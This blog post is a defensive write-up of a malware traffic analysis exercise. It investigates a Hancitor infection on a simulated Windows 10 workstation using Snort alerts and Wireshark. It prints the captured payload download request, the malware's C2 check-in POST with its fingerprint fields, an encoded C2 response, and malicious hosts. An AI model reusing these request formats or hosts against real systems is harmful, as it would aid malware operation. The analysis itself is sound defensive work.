24th October 2020
write-up-malware-traffic-analysis-sol-lightnet

Malware Traffic Analysis Exercise – SOL Lightnet

Malware Traffic Analysis

The website https://www.malware-traffic-analysis.net is a website which has the focus on traffic-related to malware infections. With every exercise, a capture file is offered for download and with the use of Wireshark, this file needs to be analyzed.

Exercise

Write an incident report based on the pcap-file and associated alerts.

Source files

The source files can be downloaded below. The download comes directly from the source location where this exercise is stored: https://www.malware-traffic-analysis.net/2020/01/30/index.html.

Password: infected

Zip archive of the pcap-file:

  • 2020-01-30-traffic-analysis-exercise.pcap (8,609,402 bytes)

Zip archive of the alerts:

  • 2020-01-30-traffic-analysis-exercise-alerts.jpg   (686,661 bytes)
  • 2020-01-30-traffic-analysis-exercise-alerts.txt   (4,568 bytes)

Scenario

  • LAN segment range:  10.20.30.0/24 (10.20.30.0 through 10.20.30.255)
  • Domain:  sol-lightnet.com
  • Domain controller:  10.20.30.2 – Sol-Lightnet-DC
  • LAN segment gateway:  10.20.30.1
  • LAN segment broadcast address:  10.20.30.255

The monitoring system SNORT is issuing a warning. All eyes of the SOC analysts go to the monitoring screen. What’s going on? SNORT is showing the following:

The 2020-01-30-traffic-analysis-exercise-alerts.txt contains the flat-file alert information:

~# cat 2020-01-30-traffic-analysis-exercise-alerts.txt
------------------------------------------------------------------------
Count:8 Event#3.1256 2020-01-30 00:54:55 UTC
ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent
10.20.30.227 -> 23.51.186.146
IPVer=4 hlen=5 tos=0 dlen=386 ID=0 flags=0 offset=0 ttl=0 chksum=48826
Protocol: 6 sport=49696 -> dport=80
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=33634 chksum=0
------------------------------------------------------------------------
Count:1 Event#3.1257 2020-01-30 00:54:55 UTC
ET INFO Windows OS Submitting USB Metadata to Microsoft
10.20.30.227 -> 40.67.249.61
IPVer=4 hlen=5 tos=0 dlen=379 ID=0 flags=0 offset=0 ttl=0 chksum=28422
Protocol: 6 sport=49697 -> dport=80
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=53490 chksum=0
------------------------------------------------------------------------
Count:16 Event#3.1267 2020-01-30 00:55:56 UTC
ET DNS Standard query response, Name Error
10.20.30.2 -> 10.20.30.227
IPVer=4 hlen=5 tos=0 dlen=146 ID=60138 flags=0 offset=0 ttl=128 chksum=65123
Protocol: 17 sport=53 -> dport=64462
len=126 chksum=15751
------------------------------------------------------------------------
Count:1 Event#3.1269 2020-01-30 00:55:57 UTC
ET POLICY exe download via HTTP - Informational
10.20.30.227 -> 49.51.133.162
IPVer=4 hlen=5 tos=0 dlen=264 ID=0 flags=0 offset=0 ttl=0 chksum=55844
Protocol: 6 sport=49728 -> dport=80
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=1844 chksum=0
------------------------------------------------------------------------
Count:1 Event#3.1270 2020-01-30 00:55:57 UTC
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
10.20.30.227 -> 49.51.133.162
IPVer=4 hlen=5 tos=0 dlen=264 ID=0 flags=0 offset=0 ttl=0 chksum=55844
Protocol: 6 sport=49728 -> dport=80
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=1844 chksum=0
------------------------------------------------------------------------
Count:4 Event#3.1271 2020-01-30 00:55:58 UTC
ET POLICY Binary Download Smaller than 1 MB Likely Hostile
49.51.133.162 -> 10.20.30.227
IPVer=4 hlen=5 tos=0 dlen=1500 ID=0 flags=0 offset=0 ttl=0 chksum=54608
Protocol: 6 sport=80 -> dport=49728
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=32895 chksum=0
------------------------------------------------------------------------
Count:30 Event#3.1275 2020-01-30 00:55:58 UTC
ET POLICY PE EXE or DLL Windows file download HTTP
49.51.133.162 -> 10.20.30.227
IPVer=4 hlen=5 tos=0 dlen=1500 ID=0 flags=0 offset=0 ttl=0 chksum=54608
Protocol: 6 sport=80 -> dport=49728
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=32895 chksum=0
------------------------------------------------------------------------
Count:1 Event#3.1305 2020-01-30 00:55:58 UTC
ET POLICY External IP Lookup api.ipify.org
10.20.30.227 -> 184.73.165.106
IPVer=4 hlen=5 tos=0 dlen=204 ID=0 flags=0 offset=0 ttl=0 chksum=13186
Protocol: 6 sport=49729 -> dport=80
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=4413 chksum=0
------------------------------------------------------------------------
Count:5 Event#3.1306 2020-01-30 00:55:58 UTC
ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin
10.20.30.227 -> 81.177.6.156
IPVer=4 hlen=5 tos=0 dlen=422 ID=0 flags=0 offset=0 ttl=0 chksum=14351
Protocol: 6 sport=49730 -> dport=80
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=63486 chksum=0
------------------------------------------------------------------------
Count:60 Event#3.1307 2020-01-30 00:56:00 UTC
ETPRO TROJAN Hancitor encrypted payload Jan 17 (1)
148.66.137.40 -> 10.20.30.227
IPVer=4 hlen=5 tos=0 dlen=1500 ID=0 flags=0 offset=0 ttl=0 chksum=28347
Protocol: 6 sport=80 -> dport=49731
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=53509 chksum=0
------------------------------------------------------------------------
Count:2 Event#3.1337 2020-01-30 00:56:00 UTC
ET TROJAN Fareit/Pony Downloader Checkin 2
10.20.30.227 -> 81.177.6.156
IPVer=4 hlen=5 tos=0 dlen=375 ID=0 flags=0 offset=0 ttl=0 chksum=14398
Protocol: 6 sport=49732 -> dport=80
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=53673 chksum=0
------------------------------------------------------------------------
Count:24 Event#3.1372 2020-01-30 43391 UTC
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
49.51.133.162 -> 10.20.30.227
IPVer=4 hlen=5 tos=0 dlen=1500 ID=0 flags=0 offset=0 ttl=0 chksum=54608
Protocol: 6 sport=80 -> dport=49728
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=43506 chksum=0

At one of our customers, our threat detection monitor SNORT apparently detected malware on the network. My team leader assigned this call to me. I start the investigation by downloading the .pcap file and open it with Wireshark.

Analysis

I have the IP address of the client in question 10.20.30.227. Let’s start by identifying the client and which user is involved, from this point I can do further research.

I filter the traffic on kerberos.CNameString && ip.src == 10.20.30.227 and I have the involved computer name DESKTOP-4C02EMG. According to the name convention, I assume this is a Windows 10 computer.

I apply this string as a column.

I have now created a new column with the title CNameString. In the last frames is now the username alejandrina.hogue visible.

The alert shows that a malicious file has probably been downloaded. I am now applying a new filter to the traffic: http.request.

It seems that frame No. 1169 is interesting. This HTTP Request shows that the file sv.exe gots downloaded. The target destination IP address matches the IP address from the alert.

Let’s Follow this TCP stream.

The client is indeed a Windows 10 machine. As Windows NT 10.0 = Windows 10.


After downloading this file. The computer is reporting to the C2 (Command and Control Server).

Let’s also follow this HTTP stream. This request includes a unique fingerprint of this endpoint this enables the attacker to identify the infected endpoints.

Let’s export this sv.exe file and upload it to https://www.virustotal.com/gui/home/upload. VirusTotal indicates the hash as the Hancitor malware. The threat monitor has also detected this file as the Hancitor malware.

Executive Summary

On Thursday 30 January 2020 at 00:55:57 UTC, a Windows 10 workstation (10.20.30.227), with the computer name DESKTOP-4C02EMG, used by Alejandrina Hogue, is downloading a file named sv.exe from the server with IP-address 49.51.133.162. This file infected the computer with the Hancitor Malware.

Indicators

The download of the payload:

GET /sv.exe HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)
Host: gengrasjeepram.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 30 Jan 2020 00:55:57 GMT
Content-Type: application/octet-stream
Content-Length: 81920
Connection: keep-alive
Last-Modified: Wed, 29 Jan 2020 14:30:00 GMT
ETag: "5e3196e8-14000"
Accept-Ranges: bytes

The request to the C2:

 POST /4/forum.php HTTP/1.1
 Accept: */*
 Content-Type: application/x-www-form-urlencoded
 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
 Host: twereptale.com
 Content-Length: 135
 Cache-Control: no-cache
 

 GUID=11299953219367802880&BUILD=2901_67231&INFO=DESKTOP-4C02EMG @ SOL-LIGHTNET\alejandrina.hogue&IP=173.166.146.119&TYPE=1&WIN=6.2(x64)HTTP/1.1 200 OK
 Server: nginx/1.16.1
 Date: Thu, 30 Jan 2020 00:55:58 GMT
 Content-Type: text/html
 Transfer-Encoding: chunked
 Connection: keep-alive
 X-Powered-By: PHP/5.4.45
 

 HZASARZAEg4OCkBVVQIVFhMdEg4cExQbFBkfVBkVF1UYEhUWG1UTFxsdHwlVSwYSDg4KQFVVCQ8UCBMJHxMXFxMdCBsOExUUGR8UDh8IVBkVF1VLBhIODgpAVVUWFQgYFQJUGRVUExRVSwYSDg4KQFVVEA8JDgoSAwkTFRkbCB9UGRUXVRMXHVUKExQJVUsGEg4OCkBVVR8WFQgYFQJUGRUXVUsHARhAEg4OCkBVVQIVFhMdEg4cExQbFBkfVBkVF1UYEhUWG1UTFxsdHwlVSAYSDg4KQFVVCQ8UCBMJHxMXFxMdCBsOExUUGR8UDh8IVBkVF1VIBhIODgpAVVUWFQgYFQJUGRVUExRVSAYSDg4KQFVVEA8JDgoSAwkTFRkbCB9UGRUXVRMXHVUKExQJVUgGEg4OCkBVVR8WFQgYFQJUGRUXVUgH

Involved external hosts:

  1. 49.51.133.162, host with the payload.
  2. 81.177.6.156, this host is identified as the C2.

The after match

The Cyber Security engineers from the SOC have directly isolated this endpoint from the network and assigned this endpoint to the System Engineers for reinstall the Operating System which includes the formatting of the disk. Other network endpoints in the network have been scanned, but no other threats are being found.

Thanks for reading this post! The scenario was made up by my brain and I enjoyed investigating, analyzing and reporting a fictitious attack. I learned a lot from it. The files come from https://www.malware-traffic-analysis.net/2020/01/30/index.html Thumbs up for Brad!

This is my first post about Malware Traffic Analysis. Please get in touch if you have any questions, recommendations or if you spot a mistake.

Happy day!

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *